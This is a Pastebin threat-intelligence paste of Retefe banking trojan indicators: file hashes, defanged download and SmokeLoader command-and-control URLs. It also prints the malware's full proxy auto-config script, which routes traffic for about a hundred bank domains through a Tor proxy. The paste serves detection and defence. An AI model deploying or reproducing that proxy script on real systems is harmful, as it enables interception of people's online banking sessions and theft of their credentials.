API tools faq
paste
Advertisement
Bank_Security

Retefe Banking Trojan IOCs

Bank_Security
May 3rd, 2019
14,678
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.14 KB | None | 0 0
raw download clone embed print report
  1. Retefe Banking Trojan IOCs
  2. \\https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe\\
  3.  
  4. 3d9bd35cc82712e3ec02ccb561633c8ab130348ffae259a35edf927e9c770052 SHA256 Fake convert-pdf-to-word-plus.exe
  5. 4415cc989396ae301d103d11dd3aa7c90cbf9fb3a7aa49113a410efab8edebe3 SHA256 Legitimate convert-pdf-to-word-plus.exe
  6. dcb9ceeedfeb1b5a19f8898cd7c3be8f2afda9ad2ee3afaf12e65c0c07783c8b SHA3256 Retefe Loader (convert-pdf-to-word-plus_driver.exe)
  7. 6750c9224540d7606d3c82c7641f49147c1b3fd0 Certificate Hash DigiCert Certificate
  8. e5d05fe5b3ff65fc4c7021908164b9e73b24f95f63c594602680400a48e32845 SHA256 macOS dmg files masquerading as Adobe installer.
  9. 1a4aa8a7cd6e21e3af77c9035905ac9109d95d11752b095d0fc48e63859cdf49
  10. 01bfea6b092c3c6067f0b13a291188537d07de026d53337113b994267b83d85a
  11. 92c153772281baf565cdf8dc62fa56208ec2cc01c3d78d206b5c51c162634cc4
  12. d9d9e7cec1d4a33eda01b00e161ed147ae0a3a9a45c92cd926235ec3bbaa8f47
  13. 07c53aa5858189c52b8ab30929b3383c0558cf762bd2c312ee2d35a222941c89
  14. e99468f96a3825145a06a418e9ddc5ad8c0124b371df370febb137ac20fed443
  15. a0f468a4f1edc8e99225baf58bcfd6b0c280460f177f6b5e2cf2a6b3479536a1
  16. 9cf0ac320a3b6a3e3ec894816e976037b9168b114513a5cbcc3b168758499b11
  17. a304e2656385f7551ef49e84b673f6ca106ce3e005d36a02db4038f31d5a774f
  18. a2b60d8200946bb33bb67d93cbae0b09b8999e9ea44449997f1a499d16091e97
  19. 07e5034744d819e59c2ec2bcfa8904cee29d4f9eae210575abfcfb89876fee65
  20. 988d04827f8bd7526a0b6f4c5704b19e9bd512d015bc5eda18b41f7f85e239d0
  21. 0d5460739d9a2c9460001b31237565ba77de02cdab329b21ad9222899d465f17
  22. e7ab3f221548d6bfd67248fb62ff767224f5ccb4505409e41ff04eb364c461a1
  23. 68762eea44ba7fec72405a84bc7af2d9f3cec3ad82f0dae7568e416fa01a1cbb
  24. dbe9bc07f721e383fea0c64cdd222a0d5e9284e2b720f95b92418471e6e64ff9
  25. c81cd3faf9ef1a01697fac4b19e89e8749d9599339bc6f95a48a61794d183a18
  26. 06f35768884874be9a76b5235e64f6fed933ed46ea431e29805b2837df58fddb
  27.  
  28. f3549eab33aaeee003450004a0485b393dd336a7a4c2ea717e08a26e5addc903
  29. hxxp://lettercreate.com/unipdf/convert-pdf-to-word-plus.exe URL Backdoored application
  30. 925ce9575622c59baacc70c0593a458a76731c5f195c6a7a790abc374402725e SHA256 Smoke Loader downloaded Retefe
  31. a75986c65170c28e5306673fd117c8e47b186895054b6f2681146c09d3f0d107 SHA256 SmokeLoader Document
  32. hxxp://www.laserowakasia.pl/wp-rss[.]php urls SmokeLoader c2
  33. hxxp://racyroyalcoin.com/wp-rss[.]php
  34. hxxp://bizbhutanevents.com/wp-rss[.]php
  35. hxxp://www.kjkpropertysolutions.com/wp-rss[.]php
  36. hxxp://thealtilium.com/wp-rss[.]php
  37. e53a9b2a484a052fc47df2a499bf942d350f052054ae9a67bdcc13f46c3d9c5b SHA256 SmokeLoader
  38.  
  39. Full proxy configuration
  40.  
  41. function FindProxyForURL(url, host) {
  42.  
  43. var proxy = "PROXY ltro3fxssy7xsqgz.onion:5588;";
  44.  
  45. var hosts = new Array('cs.directnet.com', '*akb.ch', '*ubs.com', '*bkb.ch', '*lukb.ch', '*zkb.ch',
  46. '*onba.ch', '*gkb.ch', '*bekb.ch', '*zugerkb.ch', '*bcge.ch', '*credit-suisse.com', '*.clientis.ch',
  47. 'clientis.ch', '*bcvs.ch', '*.cic.ch', 'cic.ch', 'ukb.ch', '*.ukb.ch', 'urkb.ch', '*.urkb.ch',
  48. '*eek.ch','*szkb.ch', '*shkb.ch', '*glkb.ch', '*nkb.ch', '*owkb.ch', '*cash.ch', '*bcf.ch',
  49. '*bcv.ch', '*juliusbaer.com', '*abs.ch', '*bcn.ch', '*blkb.ch', '*bcj.ch', '*zuercherlandbank.ch',
  50. '*bankthalwil.ch', '*piguetgalland.ch', '*inlinea.ch', '*bernerlandbank.ch', '*bancasempione.ch',
  51. '*bsibank.com', '*corneronline.ch', '*vermoegenszentrum.ch', '*gobanking.ch', '*slbucheggberg.ch',
  52. '*slfrutigen.ch', '*hypobank.ch', '*regiobank.ch', '*rbm.ch', '*ersparniskasse.ch', '*ekr.ch',
  53. '*sparkasse-dielsdorf.ch', '*.eki.ch', '*bankgantrisch.ch', '*bbobank.ch', '*alpharheintalbank.ch',
  54. '*aekbank.ch', '*acrevis.ch', '*credinvest.ch', '*zarattinibank.ch', '*appkb.ch', '*arabbank.ch',
  55. '*apbank.ch', '*bankbiz.ch', '*bankleerau.ch', '*btv3banken.ch', '*dcbank.ch', '*bordier.com',
  56. '*banquethaler.com', '*bankzimmerberg.ch', '*bbva.ch', '*bankhaus-jungholz.ch', '*sparhafen.ch',
  57. '*banquecramer.ch', '*banqueduleman.ch', '*ebankingch.bcp.bank', '*bil.com', '*vontobel.com',
  58. '*pbgate.net', '*bnpparibas.com', '*ceanet.ch', '*ce-riviera.ch', '*cedc.ch', '*cmvsa.ch',
  59. '*ekaffoltern.ch', '*glarner-regionalbank.ch', '*cen.ch', '*cbhbank.com', '*coutts.com',
  60. '*cimbanque.net', '*commerzbank.com', '*dominickco.ch', '*efginternational.com', '*falconpb.com',
  61. '*gemeinschaftsbank.ch', '*frankfurter-bankgesellschaft.com', '*globalance-bank.com', '*ca-nextbank.ch',
  62. '*hsbcprivatebank.com', '*leihkasse-stammheim.ch', '*incorebank.ch', '*lienhardt.ch', '*maerki-baumann.ch',
  63. '*mirabaud.com', '*pbihag.ch', '*rahnbodmer.ch', '*mybancaria.ch', '*reyl.com', '*saanenbank.ch',
  64. '*sebgroup.com', '*slguerbetal.ch', '*bankslm.ch', '*neuehelvetischebank.ch', '*slr.ch', '*slwynigen.ch',
  65. '*sparkasse.ch', '*umtb.ch', '*trafina.ch', '*ubp.com', 'direct.directnet.com', '*tkb.ch',
  66. 'onlinebanking.directnet.com', 'onlinebanking.nab.ch', 'onlinebankingbusiness.nab.ch', '*cler.ch',
  67. 'mabanque.bnpparibas', '*llb.li', '*bankfrick.li', '*vpbank.com', '*bankalpinum.com', '*unionbankag.com',
  68. '*neuebankag.li', '*raiffeisen.li', '*volksbank.li', '*bendura.li', '*lgt.com', '*retefe*.ch', '*mirabaud.lu');
  69.  
  70. for (var i = 0; i < hosts.length; i++) {
  71.  
  72. if (shExpMatch(host, hosts[i])) {
  73.  
  74. return proxy
  75.  
  76. }
  77.  
  78. }
  79.  
  80. return
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!